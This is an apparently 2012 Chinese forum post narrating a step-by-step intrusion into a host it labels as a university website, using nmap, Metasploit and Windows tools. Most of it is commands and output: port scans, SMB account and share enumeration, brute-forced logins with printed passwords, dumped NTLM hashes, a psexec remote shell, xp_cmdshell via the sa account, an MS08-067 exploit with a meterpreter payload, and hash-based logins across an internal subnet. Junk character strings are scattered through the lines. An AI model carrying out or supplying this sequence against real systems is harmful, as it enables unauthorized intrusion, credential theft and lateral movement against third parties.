广西师范网站http://202.103.242.241/
6 x( W* `# s- {& P9 ]& }8 O8 | S+ Z" G1 a- l
root@bt:~# nmap -sS -sV 202.103.242.241% l$ p d8 p; d, b
M4 s3 v+ T; o# J" S) F5 J$ iStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST; S) F- T$ \. X' Y. @ K+ G
6 ?! w% @ b4 B! m6 _
Nmap scan report for bogon (202.103.242.241)( B- A8 d; R3 q& S3 M% W
. d9 v6 A" r/ M2 \, D6 F, @Host is up (0.00048s latency).
+ C' x* v6 D3 J$ n0 i* K) g% F& ^! d6 c/ D/ w" h8 O4 n
Not shown: 993 closed ports
9 [/ E) h8 I c" l3 q. O; h! n' V
8 c9 h# S0 ~% h. s" V8 ePORT STATE SERVICE VERSION
' s, E4 Y$ V' @) ?' G: s0 L5 q, S4 w/ Q$ C
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
X9 e7 X& N$ z/ @9 f5 D) L; ?. d/ x( z( c
139/tcp open netbios-ssn
8 c, j" V" _% v' Y
$ {% `6 y0 ?, [- ^6 ?" Q: @& x445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
) q/ x: @/ T' }0 Y6 m; F. G' _' ]! y1 p+ K
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) \+ P; |: ~" D1 A0 l
2 O; N2 k% ?1 a; N1026/tcp open msrpc Microsoft Windows RPC
+ u$ n0 ~5 c+ \1 [4 R( D/ M( d* f2 Q6 t8 `
3372/tcp open msdtc?
! E7 L- X1 s. M' M) _, o% z: |) ~5 n6 Q& ^, ~
3389/tcp open ms-term-serv?4 K8 E" h+ ]& b \5 S1 N5 n5 {
5 c* |9 n. }( h. Y
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
7 \9 ~5 }9 B$ T$ J2 [! H% CSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r7 e# C8 b; e# C0 `7 b1 m
4 p* q8 v, k) t! F- y3 a
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
7 Q3 B2 [3 | D/ G1 A. h) w- z) I4 h$ k$ W- E" t2 J
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)9 z- J) {% l: T6 `
' F) T7 Q! C. {9 D! m7 K% BSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
! s- t4 X, t% p& U: k. S
9 W- H; u. c# dSF:ptions,6,”hO\n\x000Z”);6 j. }1 A4 T5 |! Y: b/ ?$ V8 X
0 W; G1 S! I/ y$ v) v% ^5 b
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)4 ~* Q( ^: H) x2 Q7 C
9 f% r2 a" E# N+ R* `6 YService Info: OS: Windows
0 k' c) W7 c$ v8 N+ e, Z
( h6 C' k+ X: B* B$ N0 AService detection performed. Please report any incorrect results at http://nmap.org/submit/ .4 x+ X1 \$ Z/ p2 c
7 Q6 C6 J7 i/ N7 T" s) a
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
& d! U& C' D( T% p. J4 \" J' Y0 R) h+ g a* W0 C
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本; C6 t* `: t1 s$ l. j5 }1 P$ p
' H; a" C5 p1 h L-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse+ v5 J5 ^, P6 I% l6 c# e: s
4 R( P- C1 S2 E) C, U0 \-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
. w2 d4 P: S5 r d
( J& T9 S* N# L6 }/ c# t+ |-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse6 y3 K7 w1 y y
, n0 N6 n1 s& u; Z, W
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse& O* C' p8 `6 r+ C8 H; d
`' h7 o7 h7 L4 H4 x; L2 _: X
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
F, g& ]' i! M/ a# W1 M
. H$ v8 z" y) z* K! l6 i1 l-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
. }7 T& R/ q% c6 N) j$ @
2 f' V9 R9 I3 j3 A# W9 o-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
O5 m8 c+ Q9 S, F! v m8 E1 W6 U* @' C, j; \- X
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse8 ?9 M8 i/ g/ t" {) J8 n! P
5 e4 J2 ^3 T5 s- @: M- p& w$ n
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse# i' L/ X$ @$ R1 L7 Y( u; n
# E& \9 |: Z# n' B* x$ C-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse" j0 W' ~0 D( h- P1 @
2 b* o1 b% j! N9 G; u-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
& ~! j$ _" N$ B# }# p- h8 `4 X
' A3 H, T% a7 V4 L8 q! Q% |-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
+ B6 p4 e4 a# H7 D% k2 Y" z4 V
# N0 L$ X( K$ n+ X- g# a-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse7 W& D0 M: ?. L& y
v% J( S0 ^6 i* \) G* i) R' S-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse# w3 W# g) [: J: W; k& j0 ]3 C
1 B. Y5 d3 c4 `' a# u6 d& m9 Z-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse' @' y$ i, r! t8 R2 N; k& Z
. q3 T3 B5 \! ~. ^+ ~) V. eroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 9 r) m+ ^% c8 G" \! O
+ D7 V! M! `6 a
//此乃使用脚本扫描远程机器所存在的账户名; s, R9 u5 u: P$ z/ }
" u3 h- r2 w9 {$ T9 V% R
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
G: M' h& u- a" \0 M' A; {1 ~. ~1 Q9 \) r- x
Nmap scan report for bogon (202.103.242.241)
/ G# n& T2 ^! w h) f& g X
4 ~* b+ b+ K- h- S. ]: I" {9 T$ MHost is up (0.00038s latency).
) K# Z s6 ?: T0 c4 t* V! s$ y6 H+ M. s# |4 h! L0 t, J% H8 F- ?
Not shown: 993 closed ports
$ P# N/ v) F+ O. i1 u* ~2 e+ X- w b% e* @3 \ e
PORT STATE SERVICE
# e4 U, j- Y/ c7 z( A! t* Q- }: ?9 p
135/tcp open msrpc- [8 T% D/ \! O, |5 r% d5 h
4 L6 v7 i' `$ I6 `
139/tcp open netbios-ssn6 [# H; O ]% q& n* g' y
6 h! k3 U/ {% R. @1 k J0 Q445/tcp open microsoft-ds
; {% q; C6 v) W1 q v2 _- d( B! ]
) ~1 ^) o3 _# d4 a6 R' x1025/tcp open NFS-or-IIS
2 [. x' S0 R# b* b
4 w0 T% N1 j5 j0 x" }1026/tcp open LSA-or-nterm2 N' G7 _9 J3 S! M
/ z3 n! t$ U% g. l3372/tcp open msdtc/ F D0 Q% z9 R4 Q$ x0 K1 P+ c
/ c2 o/ Z& [, n/ K2 T' R
3389/tcp open ms-term-serv
# ~6 X1 l* r5 j, e' z5 k" P6 R* c3 [" c; x5 ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): h1 K. H( C. v, q$ L+ F; V
2 k3 o% m3 A$ q6 e" r1 dHost script results:5 ?. @# J9 b* T3 V7 p( H
: P, n7 d% H2 w8 h1 q5 \9 V% ?| smb-enum-users:
- O; v3 ?7 d( v# p: z0 l4 H5 X" E5 k$ A3 {
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果8 \- H3 ?4 w- x8 O3 ^
/ W4 @/ D# R7 d+ ?% J- v6 jNmap done: 1 IP address (1 host up) scanned in 1.09 seconds! [, J/ u# I! U" O
9 U2 ^/ @, v5 h2 E1 q' |% ^, I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
( _$ g% h) X1 g5 ~& ~! U. s4 l) h7 {! W1 z
//查看共享
- Z" Y- L& f( l' N* @5 v* V* M/ M! {' d# G
: L( L( Y, o$ X$ w5 b" z* ]6 kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
' a& N5 N) c( k# ~- i! n
- \8 H- }2 y) A2 [. O4 ~% X3 xNmap scan report for bogon (202.103.242.241)! ?" J0 Q0 i5 H! K/ v
; e3 K. }) t. d% C# a
Host is up (0.00035s latency).& `; r. W; e$ Z9 N9 M) y
! x/ I8 @$ z" E: ANot shown: 993 closed ports
3 g, H4 G7 Z1 q6 M6 Q7 n3 c+ B
. f" N+ a* S' s3 IPORT STATE SERVICE
) I" B! p2 H5 [3 A3 q' V" ~8 G8 l" E$ f# I! F
135/tcp open msrpc, Y) q3 w+ F! ^7 r+ }
7 l4 }( F6 w* Y- P4 ^: a, O7 \139/tcp open netbios-ssn% ^2 N' h( c) y
|. W# f2 Z# c) f/ @
445/tcp open microsoft-ds0 M* T7 s+ M7 G4 X* V. A
4 @5 v6 K0 f- ]$ g1025/tcp open NFS-or-IIS8 e2 x, s K4 |
, E! t8 s5 q* y/ M$ I" I
1026/tcp open LSA-or-nterm0 }2 ~* Z2 B! z( S/ C5 a5 i
9 A e8 w2 D2 w% [+ R9 S
3372/tcp open msdtc* l ^ h: z0 i* X ?. M
5 q1 K9 |" V& O0 T' P: ^; T( I
3389/tcp open ms-term-serv
3 G$ f$ p) a( E7 e1 x$ a2 b; u, Y; y8 E" M# d$ i9 e g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ Y8 p% v/ \! \; u$ ]
* K- Y4 Z& s. jHost script results:- U$ }$ n7 {0 n+ h# U7 e1 M
9 E, u4 h! R* B- u+ P$ S
| smb-enum-shares:
' q. B+ h q1 T+ Z- q1 M5 F
& V0 L8 f2 M1 c# q# o$ a| ADMIN$
" _& l% j5 Y# [8 y% F' Z
' p, k, ]( n2 E; X| Anonymous access: <none>
1 a: ]8 e, @ z) y% m
* l( ~4 I2 J D# N$ T. Q| C$
# e' S3 @$ D! Y: _' x% m1 O' V
+ K$ ]2 @. F+ e1 o+ f; y5 P0 G3 M| Anonymous access: <none>" J7 C N$ N: }
. e* V0 T9 p0 I1 W& X
| IPC$
+ ^- `, }& r0 O H* W
$ C1 r( Z; V5 V, t|_ Anonymous access: READ8 _% }% S$ T- i
% f: t/ R2 y& V9 s' T& R( X- gNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
# @: A g7 C9 }1 y
; N9 z& t/ k1 rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
8 u: ~$ ^% g6 b- K, |$ l* ^
1 ^; _5 q2 ]7 y0 Z//获取用户密码
* m n! \& }6 b; b: F; n Q6 |
/ i/ a* p2 K# f* }Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST7 x0 y9 J/ B1 K- t1 E4 T5 D0 Q
: {# \2 v5 {% V( l, _& ]2 S$ _: E$ G
Nmap scan report for bogon (202.103.242.2418)
7 r$ J' g, j! h, L l: i! j6 a9 G1 l9 ~8 q
Host is up (0.00041s latency).
! h7 u. g, r* N7 z& u' J
" }8 p6 P5 W: pNot shown: 993 closed ports
6 ^$ s, D$ g9 h7 s4 E
) m% o6 i+ V- p1 C' h) U+ V4 q$ HPORT STATE SERVICE& e7 d2 A% n( H& q. ~+ w8 {3 W W% b) m
# t$ N8 z: O, \! P5 i) |2 `2 F135/tcp open msrpc! |# n- D, s. @, O
# _ h# _6 f, j+ I) ?139/tcp open netbios-ssn/ ~7 y v2 | l
' S8 Z$ d# G5 v/ T7 w0 \
445/tcp open microsoft-ds' t# { v8 ~1 _1 C
' M3 Q3 s" D/ Z9 y1025/tcp open NFS-or-IIS! s; K0 l; A f+ s! O/ M% F
0 _1 r3 q2 M5 o! d1026/tcp open LSA-or-nterm
, ?# ~, K2 I1 ]
1 M* J0 I: z5 [* U" _% i3372/tcp open msdtc
0 H# n! q! w( Y3 t5 H; A
8 A4 K8 R3 _; \% O" f/ W3389/tcp open ms-term-serv8 q( ]2 U1 ]! @/ R2 h* o7 G! T' b
: Q' U# N" _, Z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! K K( ^5 l* N. d$ V
0 p* R m$ o$ C
Host script results:
) b' q9 F( a# O2 G1 [+ j1 \2 E" d8 ?. B" k$ R6 r
| smb-brute:/ d2 `- R0 T7 x, u. Y
2 |; R' [1 q, `/ Iadministrator:<blank> => Login was successful5 O* W2 k) ]: C
! A9 M n% Y! F0 l|_ test:123456 => Login was successful
/ b1 e- H9 G8 y, H# z: ?' V0 r7 ?2 u- {5 i/ C* X8 a1 K' Z3 @+ J
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
, K) r8 v# ~5 O5 T* L, c3 |" }7 i$ `
0 ]- W( v; F/ X% B! _( ?3 ]root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
# ?1 i' }8 V/ q& y
9 N3 i4 f3 A4 s1 Troot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data: H- U7 _0 y; R2 b1 R! x
2 |1 R- i* e: o1 r7 m
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
" k+ n, w) D2 |# P% t+ b) R. J' i% @* r, _/ @5 ?
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139- h& s3 ~' @0 E) D
" X9 U' z: w, D1 i N0 }2 t/ \) i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
( \- u5 g% `9 T: O& E8 b3 G/ W3 R- D" N4 R' T- |$ F {
Nmap scan report for bogon (202.103.242.241)0 H# s: \; n A: r7 w) O8 K$ [: m
8 d5 J) N! m* G( B
Host is up (0.0012s latency).9 h1 x) v+ F1 y6 t: n# h
- ^, b; j# v0 w; d I: L7 N& vPORT STATE SERVICE+ b. H: [" I0 x; w% M7 }
& m+ ?" U$ v: z. T& j, n) o" }
135/tcp open msrpc
A7 n) T. y; ?" u+ `3 J6 Z
3 O g. a$ W% j" T: ]139/tcp open netbios-ssn6 b$ d4 _9 H9 i: b, F1 E
8 l9 G& @9 @$ j5 F S" F445/tcp open microsoft-ds1 s; d; u7 a9 i' A. o
: h: H9 T* a( K2 I# S( b/ BMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: P( Y5 S E* F2 C- u6 e
5 T0 \- K+ [' T% U: ~ \Host script results:7 J7 A$ \/ L' K( Y3 p
2 m8 H6 H: v* h: z% K9 ^: K
| smb-pwdump:
/ ^* _. o6 Z% ]+ @/ j& z! i9 f- i4 ^$ m
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************+ B1 s, s# b9 Y/ A1 J: u
( P; I/ s R) \1 L| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
; R5 j) x; H, e" Y
, n( q# a4 D: I- P| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D43 |5 H& L/ J2 h
- G! t+ `3 U. P( L0 A/ [
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2; p% O* V1 H2 F, e, i
4 f% L- u ?/ P4 s: |
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
+ R% b/ G! B1 Z
; N4 W2 k# }8 u, o+ o' o [. LC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell( u* C, s" j* R- `7 H* X
( [3 f4 E/ ^- ^1 |-p 123456 -e cmd.exe
# v1 ]2 m! y3 m `6 b! u0 }1 |+ J% m; N
PsExec v1.55 – Execute processes remotely
" p8 U( w2 D1 z8 y
# h: p. ]" v. G- M# [' S, k* I& J* UCopyright (C) 2001-2004 Mark Russinovich
1 Q" d3 [; I1 B- F5 ~0 m- T+ Z$ d. Q2 X. V% O) x# N2 l3 J8 v
Sysinternals – www.sysinternals.com6 j$ U% Z( @0 r- `+ `
/ L% b# L8 P3 l4 D- |$ q
Microsoft Windows 2000 [Version 5.00.2195]
1 ?8 ~7 a0 J/ V- E2 x
: U; p" j% ?6 \8 M(C) 版权所有 1985-2000 Microsoft Corp.0 X- v# P- }) w: ^5 l
( c i6 } t# ]; e. {2 |/ OC:\WINNT\system32>ipconfig
. @' R+ i1 I% {& I0 u) n/ e+ c' i8 A9 I7 }
Windows 2000 IP Configuration5 g" _( ?% ^/ V5 Z0 e4 F
9 P1 C; j" |- d1 ^1 C4 S6 uEthernet adapter 本地连接:9 d3 \) |1 ^+ @" n
* A- _: b- R' sConnection-specific DNS Suffix . :3 v2 D( {) |6 ?" n7 A1 Z/ ?9 |% r
2 m! o$ `) i7 L) v. x QIP Address. . . . . . . . . . . . : 202.103.242.241$ l7 V4 j3 ?/ l. m, E" Q4 r1 t
$ {( I! d2 {% S9 O; Q* y2 {
Subnet Mask . . . . . . . . . . . : 255.255.255.0! ?$ P; o' \- F* B2 B
s( Z* `. _4 g; gDefault Gateway . . . . . . . . . : 202.103.1.1
' o: f8 o9 \/ m. d# q, g7 X) x" ^, r6 \& J
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令2 Q( ~0 @0 M7 w: T
$ e3 ]& f/ ]" K/ {, \% w5 _root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞) e* D3 I+ P2 K1 Q# N6 t. K
+ w- V6 ]: @3 K' W" q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
8 g6 @) M7 j7 O! r+ m
" i5 `* {* b6 ^) c. \4 wNmap scan report for bogon (202.103.242.241)
: h0 S5 i7 H2 h- e* z4 w2 m! b5 }: C5 K5 S
Host is up (0.00046s latency).: v2 ^! M8 F- f/ g& x
7 J! b9 t+ X- I4 T" m
Not shown: 993 closed ports2 E1 s) M4 i/ d3 {* I8 _: G4 ]
: i+ N6 ^: j& o0 W
PORT STATE SERVICE
# ]+ x5 n, n3 P/ z- |- ?& p2 Z; E4 p# I' B" g% C
135/tcp open msrpc( x* j" K( _+ @5 G3 I) N2 ?
8 _& y1 s, |5 n
139/tcp open netbios-ssn
T# _9 W& _) d( [% K Q9 x7 {
& I" n/ B- {3 E' E4 C7 }) I445/tcp open microsoft-ds
3 B; X6 Q7 P9 |9 A. G/ D+ O0 z. C* H8 H3 N% c3 C7 Y: j
1025/tcp open NFS-or-IIS' [$ a J" s B
$ D3 a" ~0 d, H/ h+ D) [& I7 l9 A1026/tcp open LSA-or-nterm. X$ L/ T$ ]2 p" E' B
( \- H! \0 ^0 L: M/ s3 L" F; n
3372/tcp open msdtc8 ~: L& e+ w( e: ~- I6 |
% R4 L% G; c q" q# O% u$ o
3389/tcp open ms-term-serv
% a- }7 P2 |! R6 c9 v u; P. f# J! D
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# J- d6 x% M6 k
" i* ]6 H* C% ]Host script results:6 ?7 u: g- C/ g8 u5 @. P
7 n F1 {9 p9 S
| smb-check-vulns:* D, h8 n! j( m X/ b
9 a, P" i/ S1 K6 J" c/ C0 b" m+ i|_ MS08-067: VULNERABLE
" c J, {2 {# F
7 _! ^. p8 x8 R( D% f2 F+ @! s( QNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
W3 Z c1 K2 r9 R" ]" s1 ?. F1 y6 X/ z
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
5 J+ A+ `* ^4 e: m( m
+ n" j) u, H0 u7 N! fmsf > search ms08
3 B7 a$ v$ G) _4 b4 E+ M' u% `( ^
$ a' y0 H o- |- T0 imsf > use exploit/windows/smb/ms08_067_netapi' B" b1 I m* a9 g; Z9 ~0 ^
- d7 [8 J: |: e# y9 X2 b7 ]
msf exploit(ms08_067_netapi) > show options
6 \+ m- d+ o" K& a. f; `, r4 t6 q3 l+ u3 U
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
1 c/ k0 a# k0 B8 j9 V2 j$ ?8 w7 v6 r& x, ~8 d7 M R
msf exploit(ms08_067_netapi) > show payloads* l, d( n. Y& g3 b3 ?1 ^
4 |7 T+ F0 c( t% ~6 V+ H- |' Bmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
9 z4 V% e. i! q' O8 m4 H+ Q( l* ~6 ]7 |) g+ M( f! J
msf exploit(ms08_067_netapi) > exploit& T. K% `6 j& J( {; a" O5 u0 J1 d3 _
U& I1 J- j' y' r% ^meterpreter >8 F e" R: H- i3 G3 L J
9 L3 f+ L# U6 w. ^0 _
Background session 2? [y/N] (ctrl+z)
) D2 Y# x& Y. `) I2 C2 x4 b) W# L+ o3 ?! A
msf exploit(ms08_067_netapi) > sessions -l
' M# [. \& ~4 D/ l9 V/ p% P
7 d: j$ s" _7 A- V8 V* Froot@bt:/usr/local/share/nmap/scripts# vim usernames.txt, }7 R6 P R5 a9 g
' a. x4 @3 A) ?. U. E' z$ Btest; [/ X, ?* r _* a
* _9 \ n, t! n* l9 aadministrator ]: o: e& O3 j6 Z$ u' @+ p% J
* I( J ]6 J5 ?- iroot@bt:/usr/local/share/nmap/scripts# vim password.txt
! k) Z& c. E2 w/ |3 U2 m' n8 z! W( c; W) I3 G
44EFCE164AB921CAAAD3B435B51404EE
* C& N% p9 O$ ?* g4 ^- C
, l2 {$ p* t# j( ~: h& xroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
8 C B; o4 p6 \ }! o& [8 {/ ?7 @: g- T- b! g$ u( W. N
//利用用户名跟获取的hash尝试对整段内网进行登录
( ?, S- F6 v( l" M1 t, L9 d
. j3 h/ H( {: ?% n" N6 HNmap scan report for 192.168.1.105 _7 y: ^ @6 M6 A# }6 H
$ ]" [5 r" _1 L" W; b$ d
Host is up (0.00088s latency).
! u) T- { A+ ~2 M N
h3 Y1 C4 [$ Z0 _3 |3 xNot shown: 993 closed ports
) p/ w5 h& U' S. H; G3 G6 q4 ^! ^ u7 C' }# R9 u/ k
PORT STATE SERVICE+ o; U: J; o4 _
& h4 n9 N7 ~$ c) q6 T6 P, \135/tcp open msrpc
6 A: ]/ y" ~: W8 N% Q8 z& l
% @4 Y& T U: S139/tcp open netbios-ssn5 y" R6 e, f! V3 X& M- _5 a
% s9 g4 n n4 D445/tcp open microsoft-ds% p/ g" z8 R7 D) I3 ^, H5 f
, q9 z# t+ ]6 O8 R; x; H$ ~
1025/tcp open NFS-or-IIS
; t- R H9 `; M- ~. @& u; l; n! p4 F, V5 W/ j4 }0 [
1026/tcp open LSA-or-nterm
: [- c" |8 J4 }) Q
! @) j3 \ L- L4 W) g3372/tcp open msdtc
O& J* t. {: g; g. V+ _+ p2 Y% f& x- @5 |4 l
3389/tcp open ms-term-serv
" J; D9 ]8 t, o/ d$ |8 o* ~3 W/ H: Y# B4 A
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 B$ T# d V5 l
0 o ?$ |" G9 ^% ~% k, U* b. e5 {
Host script results:
p! [+ D6 C5 h* A4 L2 K7 L2 `' V
* s1 z' r: I" j! _| smb-brute:
* }: V# X9 s! O# i2 n) M6 `$ [
8 o: I$ k+ P# }( ~+ B% e|_ administrator:<blank> => Login was successful0 D: G3 O$ R) ?" N* g# g
0 _0 H' d/ u& n2 ^( S. g& }4 K* X
攻击成功,一个简单的msf+nmap攻击~~·& }; `# P) H8 X( ?
v) h( Q7 f' x& ]
|
发表于 2012-12-4 12:46:42
收藏
支持
反对